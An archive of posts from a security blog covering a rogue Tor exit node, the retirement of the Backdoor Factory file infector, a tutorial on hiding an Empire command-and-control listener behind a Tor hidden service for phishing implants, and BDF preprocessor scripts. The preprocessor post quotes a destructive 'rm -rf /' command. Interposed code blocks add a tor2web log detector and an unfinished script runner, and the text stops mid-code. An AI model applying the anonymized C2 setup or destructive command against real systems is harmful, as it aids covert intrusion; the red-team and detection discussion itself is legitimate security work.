<b>Secure All The Things</b> - midnite_runr (<a href="http://www.blogger.com/profile/14122685015764808622">profile</a>)<br />
<br />
<b>In News Archive</b> (2017-08-10)<br />
<br />
<b>Tor Russia MITM Malware Injection:</b><br />
<br />
<a href="http://threatpost.com/researcher-finds-tor-exit-node-adding-malware-to-binaries/109008" target="_blank">http://threatpost.com/researcher-finds-tor-exit-node-adding-malware-to-binaries/109008</a><br />
<br />
<a href="http://www.theregister.co.uk/2014/10/27/tor_exit_node_mashes_malware_into_downloads/" target="_blank">http://www.theregister.co.uk/2014/10/27/tor_exit_node_mashes_malware_into_downloads/</a><br />
<br />
<a href="http://www.infoworld.com/article/2839135/security/tor-project-flags-russian-exit-node-server-delivering-malware.html" target="_blank">http://www.infoworld.com/article/2839135/security/tor-project-flags-russian-exit-node-server-delivering-malware.html</a><br />
<br />
<a href="http://www.zdnet.com/rogue-tor-node-wraps-executables-with-malware-7000035060/" target="_blank">http://www.zdnet.com/rogue-tor-node-wraps-executables-with-malware-7000035060/</a><br />
<br />
<a href="http://www.itworld.com/article/2838975/tor-project-flags-russian-exit-node-server-for-delivering-malware.html" target="_blank">http://www.itworld.com/article/2838975/tor-project-flags-russian-exit-node-server-for-delivering-malware.html</a><br />
<br />
<a href="http://www.net-security.org/malware_news.php?id=2897" target="_blank">http://www.net-security.org/malware_news.php?id=2897</a><br />
<br />
<a href="http://www.scmagazineuk.com/rogue-tor-exit-node-injects-malware-into-downloaded-binaries/article/379404/" target="_blank">http://www.scmagazineuk.com/rogue-tor-exit-node-injects-malware-into-downloaded-binaries/article/379404/</a><br />
<br />
<a href="http://www.scmagazine.com/tor-exit-node-found-to-add-malware-to-downloaded-binaries/article/379526/">http://www.scmagazine.com/tor-exit-node-found-to-add-malware-to-downloaded-binaries/article/379526/</a><br />
<br />
<a href="http://www.theguardian.com/technology/2014/oct/28/tor-users-advised-check-computers-malware">http://www.theguardian.com/technology/2014/oct/28/tor-users-advised-check-computers-malware</a><br />
<br />
<a href="http://www.darkreading.com/attacks-breaches/researcher-shows-why-tor-anonymity-is-no-guarantee-of-security/d/d-id/1316994" target="_blank">http://www.darkreading.com/attacks-breaches/researcher-shows-why-tor-anonymity-is-no-guarantee-of-security/d/d-id/1316994</a><br />
<br />
<a href="http://www.computerworld.com/article/2838788/tor-project-flags-russian-exit-node-server-for-delivering-malware.html" target="_blank">http://www.computerworld.com/article/2838788/tor-project-flags-russian-exit-node-server-for-delivering-malware.html</a><br />
<div>
<br /></div>
<a href="https://blog.torproject.org/blog/tor-weekly-news-%E2%80%94-october-29th-2014" target="_blank">https://blog.torproject.org/blog/tor-weekly-news-%E2%80%94-october-29th-2014</a><br />
<br />
<br />
<b>OnionDuke Reversing:</b><br />
<br />
<a href="https://www.forbes.com/sites/thomasbrewster/2015/07/23/plagiarizing-malware/#4fb7a1cb59e3" target="_blank">https://www.forbes.com/sites/thomasbrewster/2015/07/23/plagiarizing-malware/#4fb7a1cb59e3</a><br />
<br />
<b>Apple:</b><br />
<a href="https://www.forbes.com/sites/thomasbrewster/2016/01/15/apple-mac-gatekeeper-fails-again/#35e82ee07ea5" target="_blank">https://www.forbes.com/sites/thomasbrewster/2016/01/15/apple-mac-gatekeeper-fails-again/#35e82ee07ea5</a><br />
<br />
<b>RE: Closing the Door | End of Backdoor Factory</b> (2017-08-02, updated 2020-07-14)<br />
<br />
UPDATE 7/14/2020:<div>Development of a new version is in the works, help me make it happen:
<iframe src="https://github.com/sponsors/secretsquirrel/card" title="Sponsor secretsquirrel" height="225" width="600" style="border: 0;"></iframe>
</div><div><br /></div><div><h1 class="quoteText" style="background-color: white; color: #181818; font-family: merriweather, georgia, serif; font-size: 14px; font-weight: normal; line-height: 21px; margin: 0px 0px 15px; orphans: 2; padding: 0px; widows: 2;">“The time has come," the walrus said, "to talk of many things: Of shoes and ships - and sealing wax - of cabbages and kings”</h1>
<span style="background-color: white; color: #181818; font-family: merriweather, georgia, serif; font-size: 14px; orphans: 2; widows: 2;">―</span><span style="background-color: white; color: #181818; font-family: merriweather, georgia, serif; font-size: 14px; orphans: 2; widows: 2;"> </span><a class="authorOrTitle" data-ss1501688001="1" href="https://www.goodreads.com/author/show/8164.Lewis_Carroll" style="background-color: white; color: #333333; font-family: lato, "helvetica neue", helvetica, sans-serif; font-size: 14px; font-weight: bold; orphans: 2; text-decoration: none; widows: 2;">Lewis Carroll</a><span style="background-color: white; color: #181818; font-family: merriweather, georgia, serif; font-size: 14px; orphans: 2; widows: 2;">,</span><span style="background-color: white; color: #181818; font-family: merriweather, georgia, serif; font-size: 14px; orphans: 2; widows: 2;"> </span><span id="quote_book_link_24213" style="background-color: white; color: #181818; font-family: merriweather, georgia, serif; font-size: 14px; orphans: 2; widows: 2;">Alice's Adventures in Wonderland & Through the Looking-Glass</span><br />
<br />
<div style="text-align: center;">
===</div>
<br />
I've been thinking about ending support for Backdoor Factory (BDF), including BDFProxy, for a couple of months. The idea has crept up more and more as my attention is often pulled in more interesting directions.<br />
<br />
Writing and maintaining BDF (since 2013) has been fun, but it is time to move on to other things. The code will stay up, but I won't be adding any more features or maintaining the code.<br />
<br />
I originally wrote BDF to automate the manual process of infecting PE files, to show that Anti-Virus (AV) is easy to bypass (it still is) and that file infectors still have a place in offensive use cases. I added ELF and Mach-O binaries, x86 and x64 support, code signing, etc. It was fast. So fast that I created BDFProxy, which led me to finding <a href="http://www.leviathansecurity.com/blog/the-case-of-the-modified-binaries" target="_blank">OnionDuke</a>.<br />
<br />
BDF was fairly popular, averaging about 1500 unique clones every two weeks for the past couple years just from my git repo. It was added into Kali and other distributions. I have used it in demos at many presentations: two DerbyCon presentations (<a href="https://www.youtube.com/watch?v=jXLb2RNX5xs" target="_blank">1</a>, <a href="https://www.youtube.com/watch?v=LjUN9MACaTs" target="_blank">2</a>), ShmooCon <a href="https://archive.org/details/joshpitts_shmoocon2015" target="_blank">2015</a>, Black Hat <a href="https://www.youtube.com/watch?v=OuyLzkG16Uk" target="_blank">2015</a>, Infiltrate <a href="https://vimeo.com/181069184" target="_blank">2016</a>, Eko Party <a href="https://www.youtube.com/watch?v=WI8Y24jTTlw" target="_blank">2016</a>, REcon Brussels 2016, and DEF CON 25.<br />
<br />
It wasn't until July 2015 that an AV finally flagged one of my IAT custom payloads. Since then, more AVs have written their own detections - I know how each one detects it and how to bypass them. That's how fragile AV signatures are. I could update BDF and add features to bypass their detections, wait another six months to a year for new detections to come out, and bypass again. Rinse and repeat. It's like a bug bounty where only the AVs win and I lose my time.<br />
<br />
There really is no incentive for me to continue that cycle. At least publicly.<br />
<br />
I've considered making a professional version of BDF, and that path looks quite dangerous and not very profitable. I think if someone were to do that, the risk of legal entrapment is high: one could accidentally provide customer support to someone doing illegal things and be caught up in their actions when law enforcement eventually catches them. Let's face it, if someone is paying for a cheap file infector (something that is easy to write yourself), they aren't very bright.<br />
<br />
It's time to move on to more interesting ideas and harder problems.<br />
<div>
<br /></div>
Thanks for the kind words and support over the years; it's been a hell of a ride.<br />
<div>
<br /></div>
<br /></div>
<br />
<b>Use Tor. Use Empire.</b> (2016-11-26)<br />
<div style="-webkit-text-stroke-color: rgb(4, 46, 238); -webkit-text-stroke-width: initial; color: #042eee; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none; text-decoration: underline;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">Recently I used <a href="https://github.com/adaptivethreat/Empire"><span style="-webkit-font-kerning: none; -webkit-text-stroke-color: rgb(4, 46, 238); color: #551a8b;">Empire</span></a> at work on a phishing engagement because it supports macOS, Linux, and Windows hosts from one listener. You should try it out if you find yourself needing Command and Control (C2) that is easy to use and has many features.*</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">But that is not the topic of this post.</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">Many security experts say: "Use Tor. Use Signal." And I can agree on that to some extent. However, ordering food over Tor is difficult when the waiter is looking at you in the face. I guess context is everything. </span><span style="font-family: "helvetica"; font-size: 14px; line-height: normal;">¯\_(ツ)_/¯</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">I say "Use Tor. Use Empire." /snark</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">It's not difficult and using Empire through a hidden service solves some problems:</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>You don't need a server on the Internet - put the C2 in a docker host locally or put it behind <a href="https://github.com/grugq/portal"><span style="-webkit-font-kerning: none; -webkit-text-stroke-color: rgb(4, 46, 238); color: #551a8b;">portal</span></a></span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Keep your C2 anonymous - only the Empire Listener is exposed</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Doesn't require Tor to be installed on the host/target (<a href="https://github.com/globaleaks/Tor2web/wiki"><span style="-webkit-font-kerning: none; -webkit-text-stroke-color: rgb(4, 46, 238); color: #042eee;">tor2web</span></a>)</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Secure by default (more on this)</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">On the downside:</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>My Demo uses tor2web URLs - pretty easy to filter for a defender</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Not using tor2web-type redirectors requires Tor to be installed on the host, with the agent then proxied through the Tor SOCKS listener via netcat (Mac/*nix) - on Windows it's a bit more difficult (netsh and bypass-filter all the things)</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>There have been <a href="https://people.csail.mit.edu/devadas/pubs/circuit_finger.pdf"><span style="-webkit-font-kerning: none; -webkit-text-stroke-color: rgb(4, 46, 238); color: #042eee;">attacks</span></a> to de-anonymize tor hidden services (certain conditions apply).</span></div>
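The "easy to filter for a defender" point above is worth making concrete. What follows is an added example, not code from this post or from Empire: a small proxy-log scan that flags tor2web gateway hostnames (the <code>&lt;onion&gt;.onion.to</code> form this demo uses, or any <code>&lt;base32&gt;.onion.&lt;gateway&gt;</code> name) and direct <code>.onion</code> lookups, and pulls out the <code>/:&lt;port&gt;</code> segment that the tor2web URL convention puts at the start of the path. The log format and log lines are constructed for the example; the <code>.onion.to</code> hostname is the demo listener from this post. A bare gateway host such as <code>onion.to</code> is deliberately not flagged, to keep the rule from firing on someone reading the gateway's front page.

```python
import re
from urllib.parse import urlsplit

# Constructed proxy log (timestamp, client, method, URL, status); not real traffic.
# The .onion.to hostname is the demo listener from this post.
SAMPLE_PROXY_LOG = """\
2016-11-26T21:10:01Z 10.0.0.15 GET https://www.example.com/index.html 200
2016-11-26T21:10:07Z 10.0.0.23 POST https://y4hgaofmhx3bcml4.onion.to/:9090/index.php 200
2016-11-26T21:10:09Z 10.0.0.23 GET https://y4hgaofmhx3bcml4.onion.to/:9090/news.php 200
2016-11-26T21:11:30Z 10.0.0.42 GET http://abcdefghijklmnop.onion/ 503
2016-11-26T21:12:00Z 10.0.0.15 GET https://onion.to/ 200
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")
# Onion service names are base32: 16 chars for v2 (as in the post), 56 for v3.
ONION_LABEL = re.compile(r"^(?:[a-z2-7]{16}|[a-z2-7]{56})$")
# tor2web gateways put the hidden-service port first in the path, e.g. /:9090/...
TOR2WEB_PORT = re.compile(r"^/:(\d{1,5})(?=/|$)")


def classify_host(host):
    """Return 'onion' for a direct <base32>.onion name, 'tor2web' for a
    <base32>.onion.<gateway> name such as the .onion.to form above, else None.
    A bare gateway host like onion.to is deliberately not flagged."""
    labels = host.lower().rstrip(".").split(".")
    for i, label in enumerate(labels):
        if label == "onion" and i > 0 and ONION_LABEL.match(labels[i - 1]):
            return "onion" if i == len(labels) - 1 else "tor2web"
    return None


def scan_proxy_log(text):
    """Return one finding per log line whose host is an onion or tor2web name."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # tolerate malformed lines instead of aborting the scan
        ts, client, method, url, status = m.groups()
        parts = urlsplit(url)
        host = parts.hostname or ""
        kind = classify_host(host)
        if kind is None:
            continue
        pm = TOR2WEB_PORT.match(parts.path)
        findings.append({
            "time": ts,
            "client": client,
            "method": method,
            "host": host,
            "kind": kind,
            "onion_port": int(pm.group(1)) if pm else None,
            "status": int(status),
        })
    return findings


def clients_by_kind(findings):
    """Group offending client addresses by finding kind, for a quick triage view."""
    out = {}
    for f in findings:
        out.setdefault(f["kind"], set()).add(f["client"])
    return out


if __name__ == "__main__":
    hits = scan_proxy_log(SAMPLE_PROXY_LOG)
    for h in hits:
        print(h)
    print(clients_by_kind(hits))
```

Keying on the hostname shape rather than on a fixed list of gateways is what makes this robust: every tor2web-style gateway has to carry the base32 onion name somewhere in the hostname, whichever suffix it hangs it under, and the recovered port tells the analyst which hidden-service port the agent was talking to.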
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">Here's how to do it:<br />
</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Install Tor on your server where you will be using Empire.</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Update the torrc to support the hidden service with the following syntax: HiddenServicePort 80 127.0.0.1:&lt;listener port&gt;</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeTWObiNN_4WdSFAxZKqAuDp6EMdP37hXfzRRYW241RLj0uwGWSCTJ5jYmUPOM-Gd2R5Xovg-3ft936AzQDqkZxkHj_rc3f1ptWKf1f-xz7uryo3676qolS2uJukqgsjARIo_F4u_zjjE/s1600/hidden.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeTWObiNN_4WdSFAxZKqAuDp6EMdP37hXfzRRYW241RLj0uwGWSCTJ5jYmUPOM-Gd2R5Xovg-3ft936AzQDqkZxkHj_rc3f1ptWKf1f-xz7uryo3676qolS2uJukqgsjARIo_F4u_zjjE/s640/hidden.png" width="640" /></a></div>
<span style="font-kerning: none;"><br /></span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Grab your hidden service hostname in the above directory:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihRmlEuUpMrPVGxkQKKIzsJ3jiNFEa6_dt_krcnBW8BeuCcgfRdLX6sRRFjWRnkHNMUq_RvuAdMTMhmPUdwGa_bNnnzzCD7m0_N5FF5sMFCPWocVeho5EKdSVpSHbE6uvlb1nuTlnDtag/s1600/hostname.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihRmlEuUpMrPVGxkQKKIzsJ3jiNFEa6_dt_krcnBW8BeuCcgfRdLX6sRRFjWRnkHNMUq_RvuAdMTMhmPUdwGa_bNnnzzCD7m0_N5FF5sMFCPWocVeho5EKdSVpSHbE6uvlb1nuTlnDtag/s640/hostname.png" width="640" /></a></div>
<span style="font-kerning: none;"><br /></span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Set up your listener. In the screenshot below I'm using .onion.to as the domain. It's typed correctly: https://y4hgaofmhx3bcml4.onion.to<b>/:</b>9090 - note the /:&lt;PORT&gt; after the onion.to; that's the correct syntax. I set the DefaultDelay and Jitter to higher values because Tor can be slow at times.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFZC_Ekgfd3hPTJlNTxxDnPxz8gSmKKh5T9KKFIdkMpVrBxDXze1baTf65qagkegjiEtlLURt10ML1frnRGb-O1y9DpmHPH-O4dH8Q6clFltxUiXb8mYsmhhx3ojZ8_O_te81ZE5yH7hk/s1600/info_listener.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFZC_Ekgfd3hPTJlNTxxDnPxz8gSmKKh5T9KKFIdkMpVrBxDXze1baTf65qagkegjiEtlLURt10ML1frnRGb-O1y9DpmHPH-O4dH8Q6clFltxUiXb8mYsmhhx3ojZ8_O_te81ZE5yH7hk/s640/info_listener.png" width="640" /></a></div>
<span style="font-kerning: none;"><br /></span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Now grab the launcher to deploy in your VBA macro, <a href="https://github.com/Genetic-Malware/Ebowla"><span style="-webkit-font-kerning: none; -webkit-text-stroke-color: rgb(4, 46, 238); color: #551a8b;">Ebowla</span></a>, or via manual means:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin46NUqcuEVNokanZ2k1U2mFSoawybrSzqIXLKuZiJMR_gSKe1sepxnCEq_IguyroyXEGw6sSZ2OXTyuTfiKmk-VsHVBEzzrJfkP_7O8Cg1qd6LGhhPYLDVuPXDZbQP2eW7PtxB9E4TqY/s1600/launcher.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin46NUqcuEVNokanZ2k1U2mFSoawybrSzqIXLKuZiJMR_gSKe1sepxnCEq_IguyroyXEGw6sSZ2OXTyuTfiKmk-VsHVBEzzrJfkP_7O8Cg1qd6LGhhPYLDVuPXDZbQP2eW7PtxB9E4TqY/s640/launcher.png" width="640" /></a></div>
<span style="font-kerning: none;"><br /></span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>After deployment, you should see this shortly:</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwHsQ8ry8k7TIKIlW_rDNPBi7mnXXKLBU0VGqRsTxVsbUO-s7iTBw2ReaGBh9Pb4QMQdBRH4di3GR6C7c-AEML-UTSk62y3sVuOipEM6JzE9nOi_Eq-X9MRz64YZQuZ2sUo_mpAIS9cWg/s1600/connection_back.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwHsQ8ry8k7TIKIlW_rDNPBi7mnXXKLBU0VGqRsTxVsbUO-s7iTBw2ReaGBh9Pb4QMQdBRH4di3GR6C7c-AEML-UTSk62y3sVuOipEM6JzE9nOi_Eq-X9MRz64YZQuZ2sUo_mpAIS9cWg/s640/connection_back.png" width="640" /></a></div>
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">Notice in the config that I didn't use a cert to force HTTPS agent communications, for a couple of reasons:</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>The Tor2Web site in this demo uses TLS 1.2 AES-256-GCM with ECDHE_RSA for key exchange.</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Traffic from the Tor2Web URL redirector is encrypted via the <a href="https://www.torproject.org/docs/hidden-services.html.en"><span style="-webkit-font-kerning: none; -webkit-text-stroke-color: rgb(4, 46, 238); color: #042eee;">normal tor encryption method all the way to the hidden service</span></a>.</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Using a cert to force https in my testing resulted in failure. </span><span style="font-family: "helvetica"; font-size: 14px; line-height: normal;">ಠ_ಠ</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">Ok that's it, enjoy your shells responsibly!</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">* Metasploit would have worked also, just wanted to give Empire a shot.</span></div>
<br />
<b>BDF Preprocessor and Going Forward</b> (2016-06-20)<br />
<br />
I've been giving some thought over the past couple of months to where to take the Backdoor Factory (BDF), and I've decided to do a couple of things:<br />
<ul>
<li>Make it easier to understand the internals</li>
<li>Make it more modular - drop-in scripts, patching methods, and payloads</li>
<li>Update it to python2/3 compatibility</li>
</ul>
<div>
These three things will allow for future portability within the Python world and let people write their own plugins and patching methods and extend functionality. Yes, I want to implement drop-in code injection/patching methods. It will happen; I just need to re-write some of the core BDF code.</div>
<div>
<br /></div>
<div>
So, starting with this post, I'll be explaining the preprocessor addition, added in version 3.4.0, as a first attempt to extend functionality. Preprocessor scripts are just that - Python code to do X, whatever X is. I've included a couple of examples in this release, in the preprocessor directory, to help explain what you can do, and there will be more examples in the future. The main reason I came up with the preprocessor was that I was tired of modifying core BDF code to test an idea or concept. With a preprocessor script you can write whatever you want without mucking up the main code... well, unless you muck up the main code in your script. And that is correct: there are no safety checks in the script loader. If you want to write os.system("rm -rf /") in your script, YOU CAN! So be careful running third-party preprocessor scripts.</div>
<div>
<div>
<br /></div>
</div>
<div>
Preprocessor Rules:</div>
<div>
<ul>
<li>The preprocessor functionality is enabled by the "-p" flag in BDF.</li>
<li>They run in alphabetical order.</li>
<li>Your script must be in the preprocessor directory.</li>
<li>One tempfile is created for all preprocessor scripts and is passed from one script to the next before being passed to BDF for payload injection. The modifications to the tempfile, before payload injection, can be saved for inspection and troubleshooting.</li>
</ul>
</div>
<div>
How do you write your own preprocessor script? I've included a blank template in the preprocessor directory:</div>
<div>
./preprocessor/template.py</div>
<div>
<br /></div>
<div>
Just copy that script to a new file, then open it for editing.</div>
<div>
<br /></div>
<div>
You'll notice the settings section with four options:</div>
<div>
<ul>
<li>enabled (True or False) - whether this preprocessor script is executed when the preprocessor is invoked</li>
<li>keep_temp (True or False) - saves the tempfile as it is before payload injection</li>
<li>recheck_support (True or False) - pushes the tempfile through the support check function to ensure that changes, if any, did not break patching candidacy</li>
<li>file_format (PE, ELF, Macho, or ALL) - sets which file format your script applies to</li>
</ul>
<div>
After that you have the preprocessor script itself:</div>
</div>
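As an added example (not BDF's own loader code), here is a small runner that applies the rules and the four settings above to scripts of the template's shape: alphabetical order, one shared tempfile passed along the chain, the enabled and file_format settings honoured, recheck_support wired to a caller-supplied check, and a script's returned result used to stop the chain on failure. It also adds one thing the post says BDF does not have: a SHA-256 allowlist applied before a script is imported, because importing a Python file is already executing it. The BDFContext attribute names, the allowlist, and the three demo scripts are assumptions constructed for the example.

```python
import hashlib
import importlib.util
import os
import shutil
import tempfile

# Source for the constructed demo scripts. Same shape as the post's template.py:
# settings at module level, a `preprocessor` class with __init__(self, BDF) and run().
SCRIPT_TEMPLATE = '''
enabled = {enabled}
keep_temp = False
recheck_support = {recheck}
file_format = "{fmt}"

class preprocessor:
    def __init__(self, BDF):
        self.BDF = BDF
        self.result = True
    def run(self):
        with open(self.BDF.tempfile, "ab") as f:
            f.write(b"{marker}")      # marker text is made up for the demo
        return self.result
'''
DEMO_SCRIPTS = {
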